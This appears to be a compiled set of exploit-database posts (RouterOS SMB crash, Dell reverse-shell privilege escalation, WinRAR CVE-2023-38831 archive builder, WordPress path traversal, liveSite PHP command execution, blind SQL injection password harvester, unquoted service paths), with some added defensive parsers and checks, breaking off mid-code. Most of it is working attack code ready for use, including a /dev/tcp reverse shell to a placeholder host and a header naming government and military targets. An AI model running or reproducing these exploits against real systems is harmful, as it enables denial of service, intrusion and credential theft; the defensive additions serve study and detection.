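#   u16 BE  length of the command name, then the ASCII name
#   5 B     zero trailer
HEADER = bytes.fromhex("0FFF000100000001000100000000800100010000")
TRAILER = b"\x00" * 5


def build_frame(command):
    """Frame an arbitrary command name the same way the capture frames GetCredentials."""
    name = command.encode("ascii")
    body = HEADER + struct.pack(">H", len(name)) + name + TRAILER
    return struct.pack(">I", len(body)) + body


def parse_frame(frame):
    """Inverse of build_frame; refuses frames whose length field disagrees with the data."""
    (length,) = struct.unpack(">I", frame[:4])
    body = frame[4:]
    if len(body) != length:
        raise ValueError(f"length field {length} != body length {len(body)}")
    (name_len,) = struct.unpack(">H", body[20:22])
    name = body[22:22 + name_len].decode("ascii")
    return {"length": length, "command": name, "trailer": body[22 + name_len:]}


def parse_credentials(data, field_len=35):
    """Same '#'-delimited, 35-character slicing as the script, but trailing NULs and
    whitespace are stripped and a malformed reply raises instead of IndexError."""
    parts = data.decode("latin-1").split("#")   # equivalent to "".join(map(chr, data))
    if len(parts) < 3:
        raise ValueError("unexpected response format: fewer than two '#' separators")
    username = parts[1][:field_len].rstrip("\x00 \r\n")
    password = parts[2][:field_len].rstrip("\x00 \r\n")
    return username, password


# Constructed reply in the shape the script expects: two '#'-prefixed 35-byte fields.
SAMPLE_RESPONSE = (b"\x00\x00\x00\x60#" + b"user_Ab12".ljust(35, b"\x00")
                   + b"#" + b"pw_Zz9".ljust(35, b"\x00") + b"\x00\x00")


if __name__ == "__main__":
    print(build_frame("GetCredentials") == CAPTURED)
    print(parse_frame(CAPTURED))
    print(parse_credentials(SAMPLE_RESPONSE))
```

The round trip `build_frame("GetCredentials") == CAPTURED` is the check that the inferred layout actually reproduces the capture; if a firmware revision changes the header bytes, that equality is the first thing to fail. Passing the recovered credentials to `sshpass` on a command line, as the script does, exposes them in the process list; reading them from an environment variable or a prompt is the safer habit.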
-
RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10 - Denial of Service
# Exploit Title: CVE-2024-27686: RouterOS-SMB-DOS
# Google Dork: N/A
# Date: 03/04/2024
# Exploit Author: ice-wzl, Solstice Cyber Solutions
# Vendor Homepage: https://mikrotik.com/
# Software Link: https://mikrotik.com/download/archive
# Version: RouterOS devices ranging from 6.40.5 - 6.44 and 6.48.1 - 6.49.10
# Tested on: RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10
# CVE : CVE-2024-27686

#!/usr/bin/python3
# Found by ice-wzl in conjunction with Solstice Cyber Solutions
import argparse
import sys
import socket

# Define the packets
# the packet that causes the crash on 6.40.5 - 6.42.3 (a fuzzed SMB2 TREE_CONNECT)
fuzzed_packet_6 = b'\x00\x00\x00n\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x03\x00\xf1\x1f\x08\x00\x00\x00\x00\x00\x00\xe1\xbe\x82\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00G\xe5\x07\xf5\x07\xec\x01u\xe4Q]\x9e\xea\xedn\xa9\t\x00\x00\x00H\x00&\x00\\\x00\\\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x005\x00.\x007\x007\x00\\\x00p\x00u\x00b\x00'

# SMB2 NEGOTIATE, sent first on the newer branch
packet_0 = b'\x00\x00\x00\xea\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x05\x00\x01\x00\x00\x00\x7f\x00\x00\x00\xe8\xe4*\x99\xc9\xeb\xb6E\xa2A\xe9(\xee%\xe5\xdfp\x00\x00\x00\x04\x00\x00\x00\x02\x02\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00_\xf7m\xf2h*\x8f\x8ae\x0f8+T=Na8_\x0b@C\x82\xe7\x87\xc3qZ\xd7\xcf0M\x87\x00\x00\x02\x00\n\x00\x00\x00\x00\x00\x04\x00\x02\x00\x01\x00\x04\x00\x03\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x00\x00\x03\x00\x02\x00\x01\x00\x00\x00\x05\x00\x1a\x00\x00\x00\x00\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x005\x00.\x008\x004\x00'

# fuzzed SMB2 SESSION_SETUP (SPNEGO/NTLMSSP), the packet that causes the crash on 6.48.1 - 6.49.10
packet_2_fuzzed = b'\x00\x00\x00\xa2\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00X\x00J\x00\x00\x00\x00\x00\x00\x00\x00\x00`H\x05\x06+\x06\x01\x05\x05\x02\xa0>0<\xa0\x0e21540373\xed\xba\xad211\x0c\x06\n+\x06\x01\x04\x01\x82294517887446830\x02\x02\n\xa2*\x04(NTLMSSP\x00\x01\x00\x00\x00\x15\x82\x08b\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x06\x01\x00\x00\x00\x00\x00\x0f'


def open_connection(ip, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((ip, port))
        return s
    except ConnectionRefusedError:
        print(f"[!] Connection Refused on: {ip} {port}")
        sys.exit(2)


def send_payload_high(s):
    # 6.48.1 - 6.49.10: negotiate first, then the fuzzed session setup
    s.send(packet_0)
    s.send(packet_2_fuzzed)
    s.close()


def send_payload_low(s):
    # 6.40.5 - 6.44: a single fuzzed tree connect is enough
    s.send(fuzzed_packet_6)
    s.close()


def verify_input(user_inp):
    # returns 1 or 2 for a valid choice, 3 for an out-of-range number, 0 for a non-number
    try:
        user_inp = int(user_inp)
        if user_inp > 2 or user_inp < 1:
            return 3
        return user_inp
    except ValueError:
        return 0


if __name__ == '__main__':
    parser = argparse.ArgumentParser(prog='SMB Crash',
                                     description='Crashes Mikrotik RouterOS SMB Service 6.40.5 - 6.49.10',
                                     epilog='Discovered by: ice-wzl')
    parser.add_argument("-t", "--target", action="store", dest="target")
    # --port was required in the original, which made its 445 fallback unreachable; it now defaults to 445
    parser.add_argument("-p", "--port", action="store", dest="port", type=int, default=445)
    args = parser.parse_args()

    if not args.target:
        print(f"[+] python3 {sys.argv[0]} --help")
        sys.exit(1)

    print("[+] What version is the target:\n\t[1] 6.40.5 - 6.44\n\t[2] 6.48.1 - 6.49.10\nEnter 1 or 2:")
    version_choice = verify_input(input("--> "))
    if version_choice == 0:
        print("Please enter a number...")
        sys.exit(3)
    elif version_choice == 3:
        print("Please enter a number between 1 and 2")
        sys.exit(4)

    get_connect = open_connection(args.target, args.port)
    if version_choice == 1:
        send_payload_low(get_connect)
    else:
        send_payload_high(get_connect)
    print(f"[+] Sent DOS to {args.target} on {args.port}")
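The packets above are opaque byte strings, which makes it hard to see what is being sent or to vary it. The Python example below is added here and is not the exploit author's code or MikroTik's; it builds a well-formed SMB2 TREE_CONNECT request to the same UNC path that appears in `fuzzed_packet_6` (`\\192.168.15.77\pub`) from named fields, and parses it back with the length consistency checks a receiver should apply: the NetBIOS length prefix against the bytes actually received, and the TREE_CONNECT path offset/length against the message size. Field layout follows MS-SMB2. The page's packets are fuzzed, and this example does not claim which mutation in them triggers the crash; the header constants and the sample frame are this example's own.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_COMMANDS = {0x0000: "NEGOTIATE", 0x0001: "SESSION_SETUP", 0x0002: "LOGOFF",
                 0x0003: "TREE_CONNECT", 0x0004: "TREE_DISCONNECT", 0x0005: "CREATE"}

# SMB2 header (MS-SMB2 2.2.1.2), little-endian, 64 bytes:
# ProtocolId(4) StructureSize(2) CreditCharge(2) Status(4) Command(2) Credits(2)
# Flags(4) NextCommand(4) MessageId(8) Reserved(4) TreeId(4) SessionId(8) Signature(16)
HDR = "<4sHHIHHIIQIIQ16s"
HDR_LEN = struct.calcsize(HDR)  # 64


def smb2_header(command, message_id=0, credits=1, session_id=0, tree_id=0, flags=0):
    return struct.pack(HDR, SMB2_MAGIC, 64, 0, 0, command, credits, flags, 0,
                       message_id, 0, tree_id, session_id, b"\x00" * 16)


def tree_connect_request(unc_path, **hdr):
    """TREE_CONNECT body (MS-SMB2 2.2.9): StructureSize=9, Flags/Reserved, PathOffset,
    PathLength, then the UTF-16LE share path directly after the 8-byte body header."""
    path = unc_path.encode("utf-16-le")
    body = struct.pack("<HHHH", 9, 0, HDR_LEN + 8, len(path)) + path
    return smb2_header(0x0003, **hdr) + body


def netbios_frame(smb_message):
    """NetBIOS session service header: a zero byte and a 24-bit big-endian length."""
    return struct.pack(">I", len(smb_message)) + smb_message


def parse_frame(frame):
    """Decode one framed SMB2 message and report whether its lengths are consistent."""
    (declared,) = struct.unpack(">I", frame[:4])
    msg = frame[4:]
    if len(msg) < HDR_LEN or msg[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    f = struct.unpack(HDR, msg[:HDR_LEN])
    info = {
        "declared_len": declared, "actual_len": len(msg), "length_ok": declared == len(msg),
        "structure_size": f[1], "command": SMB2_COMMANDS.get(f[4], hex(f[4])),
        "message_id": f[8], "session_id": f[11],
    }
    if f[4] == 0x0003 and len(msg) >= HDR_LEN + 8:
        _, _, poff, plen = struct.unpack("<HHHH", msg[HDR_LEN:HDR_LEN + 8])
        path_bytes = msg[poff:poff + plen]
        # a receiver must check this before trusting poff/plen, which is exactly the
        # kind of field a fuzzer mutates
        info["path_in_bounds"] = poff + plen <= len(msg) and len(path_bytes) == plen
        info["path"] = path_bytes.decode("utf-16-le", errors="replace")
    return info


# Constructed sample: a well-formed request to the share named in fuzzed_packet_6.
SAMPLE = netbios_frame(tree_connect_request("\\\\192.168.15.77\\pub", message_id=7, session_id=6))


if __name__ == "__main__":
    print(parse_frame(SAMPLE))
    print(parse_frame(SAMPLE[:-3]))   # truncated: declared length no longer matches
```

Feeding `parse_frame` the page's own byte strings (with the NetBIOS prefix they already carry) shows their command types and whether their declared lengths agree with the bytes present, which is the quickest way to tell a structurally valid request from a fuzzed one before sending anything at a device you do not own.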
-
Dell Security Management Server < 11.9.0 - Local Privilege Escalation
# Exploit Title: Dell Security Management Server versions prior to 11.9.0 - Local Privilege Escalation
# Exploit Author: Amirhossein Bahramizadeh
# CVE : CVE-2023-32479

Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server versions prior to 11.9.0 contain a privilege escalation vulnerability due to an improper ACL on the non-default installation directory. A local malicious user could potentially exploit this vulnerability by replacing binaries in the installation directory and obtaining a reverse shell, leading to privilege escalation.

#!/bin/bash
INSTALL_DIR="/opt/dell"

# Check whether the installation directory is writable by the current user (improper ACL)
if [ -w "$INSTALL_DIR" ]; then
    # Drop a script into the installation directory that opens a reverse shell.
    # "your-malicious-server" is a placeholder for the listener host.
    echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"
    echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"
    chmod +x "$INSTALL_DIR/dell-exploit"
    # Wait for the reverse shell to connect back
    nc -lvnp 1234
fi
-
WinRAR version 6.22 - Remote Code Execution via ZIP archive
################################################################################################
# Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831                     #
#                                                                                              #
# Author        : E1.Coders                                                                    #
#                                                                                              #
# Contact       : E1.Coders [at] Mail [dot] RU                                                 #
#                                                                                              #
# Security Risk : High                                                                         #
#                                                                                              #
# Description   : All target's GOV & Military websites                                         #
#                                                                                              #
################################################################################################
#
# Expl0iTs:
#

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "zip.h"   /* minizip */

#define PDF_FILE    "document.pdf"
#define FOLDER_NAME "document.pdf\\"
#define SCRIPT_FILE "script.bat"
#define ZIP_FILE    "exploit.zip"

int main(void)
{
    zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE);
    if (zf == NULL) {
        printf("Error opening ZIP file\n");
        return -1;
    }

    zip_fileinfo zfi;
    memset(&zfi, 0, sizeof(zfi));

    /* 1. the decoy document, copied in from a local document.pdf */
    if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL,
                            Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
        printf("Error adding PDF file to ZIP file\n");
        zipClose(zf, NULL);
        return -1;
    }

    FILE *fp = fopen(PDF_FILE, "rb");
    if (fp == NULL) {
        printf("Error opening PDF file\n");
        zipCloseFileInZip(zf);
        zipClose(zf, NULL);
        return -1;
    }

    char buffer[1024];
    int bytes_read;
    while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) {
        if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) {
            printf("Error writing PDF file to ZIP file\n");
            fclose(fp);
            zipCloseFileInZip(zf);
            zipClose(zf, NULL);
            return -1;
        }
    }
    fclose(fp);
    zipCloseFileInZip(zf);

    /* 2. a folder entry carrying the same name as the document */
    if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL,
                            Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
        printf("Error adding folder to ZIP file\n");
        zipClose(zf, NULL);
        return -1;
    }
    zipCloseFileInZip(zf);

    /* 3. the batch script inside that folder */
    char script_name[256];
    snprintf(script_name, sizeof(script_name), "%s%s", FOLDER_NAME, SCRIPT_FILE);
    if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL,
                            Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
        printf("Error adding script file to ZIP file\n");
        zipClose(zf, NULL);
        return -1;
    }

    char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n";
    if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) {
        printf("Error writing script file to ZIP file\n");
        zipCloseFileInZip(zf);
        zipClose(zf, NULL);
        return -1;
    }
    zipCloseFileInZip(zf);

    zipClose(zf, NULL);
    printf("ZIP file created successfully\n");
    return 0;
}

References:
https://nvd.nist.gov/vuln/detail/CVE-2023-38831
https://github.com/HDCE-inc/CVE-2023-38831
https://www.cvedetails.com/cve/CVE-2023-38831/
https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/CVE-2023-38831
http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html
https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/
https://news.ycombinator.com/item?id=37236100
https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
https://hdce.medium.com/cve-2023-38831-winrar-zero-day-poses-new-risks-for-traders-684911befad2
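What the C program above builds is an archive in which a plain file and a folder share a name, with a script inside the folder. That layout is also the thing a mail gateway or sandbox can look for. The Python example below is added here and is not the post author's code or WinRAR's; it builds the same three entries in memory with the standard-library `zipfile` module (forward slashes, the zip convention, where the C code writes backslashes; the "PDF" body is a constructed placeholder) and then scans any archive for a file name that is also used as the directory of another entry. Trailing spaces are ignored in the comparison because the public write-ups of CVE-2023-38831 linked in the references describe `name.ext ` (trailing space) used for both the file and the folder.

```python
import io
import zipfile


def build_archive(entries):
    """Write an in-memory zip from {name: bytes}; a name ending in '/' is a directory ent."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def find_file_directory_collisions(zip_bytes):
    """Return sorted (file, entry) pairs where a plain file's name is also the directory
    a second entry lives in. Backslashes are normalised and trailing spaces ignored."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = [n.replace("\\", "/") for n in zf.namelist()]
    files = {n.rstrip(" ") for n in names if not n.endswith("/")}
    hits = []
    for n in names:
        if n.endswith("/") or "/" not in n:
            continue
        parent = n.rsplit("/", 1)[0].rstrip(" ")
        if parent in files:
            hits.append((parent, n))
    return sorted(hits)


# Same three entries the C program above writes (constructed contents).
LAYOUT_FROM_C_CODE = {
    "document.pdf": b"%PDF-1.4\n% placeholder, not a real document\n",
    "document.pdf/": b"",
    "document.pdf/script.bat": b"@echo off\r\necho test\r\n",
}

# A benign archive with a document and an unrelated folder (constructed).
CLEAN_LAYOUT = {
    "document.pdf": b"%PDF-1.4\n",
    "notes/readme.txt": b"hello\n",
}


if __name__ == "__main__":
    print(find_file_directory_collisions(build_archive(LAYOUT_FROM_C_CODE)))
    print(find_file_directory_collisions(build_archive(CLEAN_LAYOUT)))
```

The check reads only the central directory, so it is cheap to run on every inbound archive; a hit is a reason to quarantine the file, not a proof of exploitation, since a legitimate archive could in principle contain the same collision.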
-
Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal
# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
# Date: 2024-03-06
# Exploit Author: Ven3xy
# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.10
# Tested on: Linux

import os
import sys
import time
from urllib.parse import urljoin

import requests


def exploit(target_url, file_name, depth):
    # depth = number of '../' needed to climb from the plugin's backup directory to '/'
    traversal = '../' * depth
    exploit_url = urljoin(target_url, '/wp-admin/tools.php')
    params = {
        'page': 'backup_manager',
        'download_backup_file': f'{traversal}{file_name}'
    }
    response = requests.get(exploit_url, params=params)

    if response.status_code == 200 and response.headers.get('Content-Disposition') \
            and 'attachment; filename' in response.headers['Content-Disposition'] \
            and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
        print(response.text)  # Replace with the desired action for the downloaded content
        # basename so that a file name like etc/passwd is saved as a flat local file
        file_path = f'simplebackup_{os.path.basename(file_name)}'
        with open(file_path, 'wb') as file:
            file.write(response.content)
        print(f'File saved in: {file_path}')
    else:
        print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python exploit.py <target_url> <file_name> <depth>")
        sys.exit(1)

    target_url = sys.argv[1]
    file_name = sys.argv[2]
    depth = int(sys.argv[3])

    print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n")
    time.sleep(5)
    exploit(target_url, file_name, depth)
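The Asterisk AMI GetConfig post and the Simple Backup post above are the same bug in two products: a user-supplied file name is joined onto a base directory and `../` climbs out of it. The Python example below is added here and is not code from either project or either author; it shows the containment check that closes the hole, resolving the requested name against the base directory and refusing any result outside it, and exercises it with the exact traversal strings the two exploits use. The temporary directory, the `etc/asterisk` name and the `manager.conf` contents are constructed for the example.

```python
import os
import tempfile


def resolve_within(base_dir, requested):
    """Resolve a user-supplied file name against base_dir and refuse any result that
    lands outside it. realpath() collapses '..' and follows symlinks, so a symlink
    inside base_dir that points elsewhere is rejected too. An absolute request does
    not bypass the check because the comparison happens after resolution."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"{requested!r} resolves outside {base}")
    return target


def demo():
    """Exercise the check against the traversal strings used by the two exploits above."""
    with tempfile.TemporaryDirectory() as tmp:
        conf_dir = os.path.join(tmp, "etc", "asterisk")      # stand-in for the config dir
        os.makedirs(conf_dir)
        with open(os.path.join(conf_dir, "manager.conf"), "w") as fh:
            fh.write("[general]\nenabled = yes\n")            # constructed content
        results = {"manager.conf": os.path.basename(resolve_within(conf_dir, "manager.conf"))}
        for bad in ("../../../../../../../../etc/hosts",      # Asterisk PoC
                    "../../wp-config.php",                      # Simple Backup style
                    "/etc/hosts"):                              # absolute path
            try:
                resolve_within(conf_dir, bad)
                results[bad] = "allowed"
            except ValueError:
                results[bad] = "rejected"
        return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{verdict:8} {name}")
```

Stripping `../` from the input is the tempting alternative and it is weaker: `....//` survives a single pass, and URL-encoded or Windows-style separators are easy to miss. Comparing the resolved path is one check that covers all of those encodings at once.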
-
liveSite Version 2019.1 - Remote Code Execution
## Exploit Title: liveSite Version 2019.1 - Campaigns Remote Code Execution
### Date: 2024-1-9
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://livesite.com/
### Version: 2019.1
### Tested on: https://www.softaculous.com/apps/cms/liveSite

1) Log in with admin credentials. Click Campaigns > Create Campaign > choose the format "Plain Text" and write your payload in the body:

   https://127.0.0.1/liveSite/livesite/add_email_campaign.php

   Payload: <?php echo system('cat /etc/passwd'); ?>

2) After saving you will see the result:

Result:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:997:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:997:995::/var/lib/chrony:/sbin/nologin
soft:x:1000:1000::/home/soft:/sbin/nologin
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
emps:x:995:1001::/home/emps:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
exim:x:93:93::/var/spool/exim:/sbin/nologin
vmail:x:5000:5000::/var/local/vmail:/bin/bash
pinguzo:x:992:992::/etc/pinguzo:/bin/false
webuzo:x:987:987::/home/webuzo:/bin/bash
apache:x:986:985::/home/apache:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
-
Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)
# Exploit Title: Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)
# Google Dork: n/a
# Date: 04/02/2024
# Exploit Author: Gian Paris C. Agsam
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip
# Version: 1.0
# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12
# CVE : n/a

import argparse

import requests
from colorama import (Fore as F, Back as B, Style as S)

BR, FT, FR, FG, FY, FB, FM, FC, ST, SD, SB, FW = B.RED, F.RESET, F.RED, F.GREEN, F.YELLOW, F.BLUE, F.MAGENTA, F.CYAN, S.RESET_ALL, S.DIM, S.BRIGHT, F.WHITE

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Requests are routed through a local intercepting proxy (127.0.0.1:8080); remove if none is running
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')
parser.add_argument('-u', '--url', help='Base URL of the target, e.g. http://127.0.0.1')
args = parser.parse_args()


def banner():
    print(f"""{FR}
 ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄ ▄▄▄ ▪ ·▄▄▄▄ ▪
▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪ ██ ██▪ ██
▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄ ▄█▀▄ ▐█·▐█· ▐█▌
▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██.
██ ▀█▄▀▪▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀ ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀•
    Github: https://github.com/offensive-droid
{FW}
""")


# Define the characters to test
chars = [
    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
    'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
    'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
    'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
    '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '@', '#'
]


def sqliPayload(char, position, userid, column, table):
    # Time-based oracle: the query sleeps 3 seconds when the character at `position` matches
    sqli = 'admin\' UNION SELECT IF(SUBSTRING('
    sqli += str(column) + ','
    sqli += str(position) + ',1) = \''
    sqli += str(char) + '\',sleep(3),null) FROM '
    sqli += str(table) + ' WHERE uname="admin"\''
    return sqli


def postRequest(URL, sqliReq, char, position):
    sqliURL = URL
    params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}
    req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)
    # A response that took at least 2 seconds means the sleep(3) branch ran: the guess was right
    if req.elapsed.total_seconds() >= 2:
        print("{} : {}".format(char, req.elapsed.total_seconds()))
        return char
    return ''


def theHarvester(target, CHARS, url):
    print("Retrieving admin password ({}.{})".format(target['table'], target['column']))
    position = 1
    full_pass = ""
    # Only the first four characters are retrieved (position < 5); raise the bound to recover more
    while position < 5:
        for char in CHARS:
            sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])
            found_char = postRequest(url, sqliReq, char, position)
            full_pass += found_char
        position += 1
    return full_pass


if __name__ == "__main__":
    banner()
    HOST = str(args.url)
    PATH = HOST + "/hotel booking/admin/login.php"
    adminPassword = {"id": "1", "table": "manager", "column": "upass"}
    adminPass = theHarvester(adminPassword, chars, PATH)
    print("Admin Password:", adminPass)
-
Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
# Exploit Title: Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
# Date: 2024-04-2
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.rapid7.com/
# Software Link: https://www.rapid7.com/products/nexpose/
# Version: 6.6.240
# Tested: Windows 10 x64

# Step to discover Unquoted Service Path:

C:\Users\saudh>wmic service where 'name like "%nexposeconsole%"' get name, displayname, pathname, startmode, startname
DisplayName               Name            PathName                                                  StartMode  StartName
Nexpose Security Console  nexposeconsole  "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe"  Auto       LocalSystem

# Service info:

C:\Users\saudh>sc qc nexposeconsole
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: nexposeconsole
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Nexpose Security Console
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications, where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
-
ASUS Control Center Express 01.06.15 - Unquoted Service Path
# Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service Path Privilege Escalation
# Date: 2024-04-02
# Exploit Author: Alaa Kachouh
# Vendor Homepage: https://www.asus.com/campaign/ASUS-Control-Center-Express/global/
# Version: Up to 01.06.15
# Tested on: Windows
# CVE: CVE-2024-27673

===================================================================

ASUS Control Center Express Version =< 01.06.15 contains an unquoted service path which allows attackers to escalate privileges to the system level.
Assuming attackers have write access to C:\, the attackers can abuse the Asus service "Apro console service"/apro_console.exe which upon restarting will invoke C:\Program.exe with SYSTEM privileges.
The binary path of the service alone isn't susceptible, but upon its initiation, it will execute C:\program.exe as SYSTEM.

Service Name: AProConsoleService
binary impacted: apro_console.exe

# If a malicious payload is inserted into C:\ and service is executed in any way, this can grant privileged access to the system and perform malicious activities.
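An added audit check for the unquoted-service-path class described in the Nexpose and ASUS entries above (example code, not from either advisory): it parses `sc qc`-style output, reports whether BINARY_PATH_NAME is unquoted and contains spaces, and lists the directories whose write permissions must exclude unprivileged users. The unquoted sample service is constructed; the quoted sample reuses the path printed in the Nexpose entry.

```python
import re

# Constructed `sc qc` output (not from either advisory) with the path left
# unquoted so the check has something to flag; the second sample reuses the
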